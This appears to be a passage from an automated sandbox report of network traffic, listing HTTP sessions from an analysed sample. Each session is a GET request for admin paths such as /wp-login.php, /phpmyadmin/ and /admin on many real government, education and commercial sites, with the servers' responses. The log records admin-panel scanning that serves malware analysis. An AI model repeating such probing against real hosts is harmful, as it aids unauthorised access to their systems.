                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                523192.168.2.66552323.4.32.21680
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.482307911 CET180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.589948893 CET186INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://steamcommunity.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                524192.168.2.665374185.78.166.13080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.491625071 CET204OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.838294029 CET397INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                525192.168.2.665494190.202.2.8080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.651849985 CET188OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: contribuyente.seniat.gob.ve
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.812891006 CET499INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Oracle-Application-Server-10g
                                                                                                                                                                                                                                                                                                                                                                Location: http://contribuyente.seniat.gob.ve/index.htm
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 66 38 20 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 63 6f 6e 74 72 69 62 75 79 65 6e 74 65 2e 73 65 6e 69 61 74 2e 67 6f 62 2e 76 65 2f 69 6e 64 65 78 2e 68 74 6d 22 3e 68 65 72 65 3c 2f 41 3e 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: f8 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>301 Moved Permanently</TITLE></HEAD><BODY><H1>Moved Permanently</H1>The document has moved <A HREF="http://contribuyente.seniat.gob.ve/index.htm">here</A>.<P></BODY></HTML>0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.014967918 CET186OUTGET /index.htm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: contribuyente.seniat.gob.ve
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.175885916 CET1160INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Oracle-Application-Server-10g
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: HttpOnly;Secure
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self';
                                                                                                                                                                                                                                                                                                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                                                                Clear-Site-Data: cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY, SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Feature-Policy: layout-animations 'none'; unoptimized-images 'none'; oversized-images 'none'; sync-script 'none'; sync-xhr 'none'; unsized-media 'none';
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Expect-CT: enforce; max-age=43200
                                                                                                                                                                                                                                                                                                                                                                Public-Key-Pins: none
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 15 May 2023 15:21:36 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "11fc95-2dd-64624e00"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 733
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 0d 0a 3c 21 2d 2d 20 43 72 65 61 74 65 64 20 62 79 20 48 54 54 72 61 63 6b 20 57 65 62 73 69 74 65 20 43 6f 70 69 65 72 2f 33 2e 34 37 2d 32 37 20 5b 58 52 26 43 4f 27 32 30 31 33 5d 20 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 4d 69 72 72 6f 72 65 64 20 66 72 6f 6d 20 77 77 77 2e 73 65 6e 69 61 74 2e 67 6f 62 2e 76 65 2f 20 62 79 20 48 54 54 72 61 63 6b 20 57 65 62 73 69 74 65 20 43 6f 70 69 65 72 2f 33 2e 78 20 5b 58 52 26 43 4f 27 32 30 31 33 5d 2c 20 54 68 75 2c 20 31 36 20 4a 61 6e 20 32 30 31 34 20 30 34 3a 31 34 3a 31 38 20 47 4d 54 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 41 64 64 65 64 20 62 79 20 48 54 54 72 61 63 6b 20 2d 2d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 3c 21 2d 2d 20 2f 41 64 64 65 64 20 62 79 20 48 54 54 72 61 63 6b 20 2d 2d 3e 0d 0a 3c 48 45 41 44 3e 0d 0a 3c 54 49 54 4c 45 3e 50 61 67 65 20 68 61 73 20 6d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 2f 48 45 41
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->... Mirrored from www.seniat.gob.ve/ by HTTrack Website Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT -->... Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=iso-8859-1" />... /Added by HTTrack --><HEAD><TITLE>Page has moved</TITLE></HEA
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.175900936 CET300INData Raw: 44 3e 0d 0a 3c 42 4f 44 59 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 52 65 66 72 65 73 68 22 20 43 4f 4e 54 45 4e 54 3d 22 30 3b 20 55 52 4c 3d 68 74 74 70 3a 2f 2f 64 65 63 6c 61 72 61 63 69 6f 6e 65 73 2e 73 65 6e 69 61 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: D><BODY><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://declaraciones.seniat.gob.ve"><A HREF="http://declaraciones.seniat.gob.ve"><B>Cargando Portal...</B></A></BODY>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.175915003 CET71INData Raw: 65 20 43 6f 70 69 65 72 2f 33 2e 78 20 5b 58 52 26 43 4f 27 32 30 31 33 5d 2c 20 54 68 75 2c 20 31 36 20 4a 61 6e 20 32 30 31 34 20 30 34 3a 31 34 3a 31 38 20 47 4d 54 20 2d 2d 3e 0d 0a 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT --></HTML>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                526192.168.2.665499186.113.7.20480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.652157068 CET188OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: oferta.senasofiaplus.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.837270021 CET151INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://oferta.senasofiaplus.edu.co/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                527192.168.2.649290195.85.23.9580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.652203083 CET177OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.878709078 CET756INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                location: https://ro.bongacams.com/PhpMyAdmin
                                                                                                                                                                                                                                                                                                                                                                x-bc: ded6941
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-ded6941-web19
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=sPlAOmI.SbF_K0Yty9SLocQQuQdWvCM6UlqNiDKSrHQ-1707131771-1-AZvJvOdJHH+VSfQDYfBdRd41atdb1A/vcpLWtYycbqzt0xc3vhWXbndMTivUeKm3/bUkXK+WsVKIU5M1CWciaxI=; path=/; expires=Mon, 05-Feb-24 11:46:11 GMT; domain=.bongacams.com; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6529d1ad94-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                528192.168.2.66549831.216.144.580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.652276993 CET162OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.853646040 CET195INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://mega.nz
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                529192.168.2.665100104.21.5.2580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.692106962 CET173OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: opsu.terna.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.816540956 CET697INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://terna.net
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RBn9LzKfDcASzkCAwIpy7KhjHmATSTB3mFCOQboQEVmdwM9NGIMeNl6zQgIjhdx0rDAGmGZ4F4zUr0kXQKexGz0JvrX0LMFfE5YS7t6jD%2F%2BS4let8L%2FBIt6WEbucybTS8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd656a6e0701-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                530192.168.2.66502041.33.126.10080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.695605040 CET174OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: student.emis.gov.eg
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.948928118 CET137INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://student.emis.gov.eg/admin
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                531192.168.2.649249177.74.1.15780
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.707354069 CET179OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sistemas.pa.gov.br
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.986460924 CET116INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://sistemas.pa.gov.br/phpMyAdmin/


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                532192.168.2.665448185.78.166.13080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.708101034 CET203OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.060455084 CET396INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                533192.168.2.665112185.51.191.4880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.727039099 CET180OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.990206003 CET239INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Location: http://innovationdevelopment.eu/admin/w
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.995070934 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                534192.168.2.66502141.33.126.10080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.734694958 CET180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: student.emis.gov.eg
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.992058992 CET143INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://student.emis.gov.eg/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                535192.168.2.664750103.90.225.7080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.735351086 CET175OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ngoalongvn.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.088222980 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
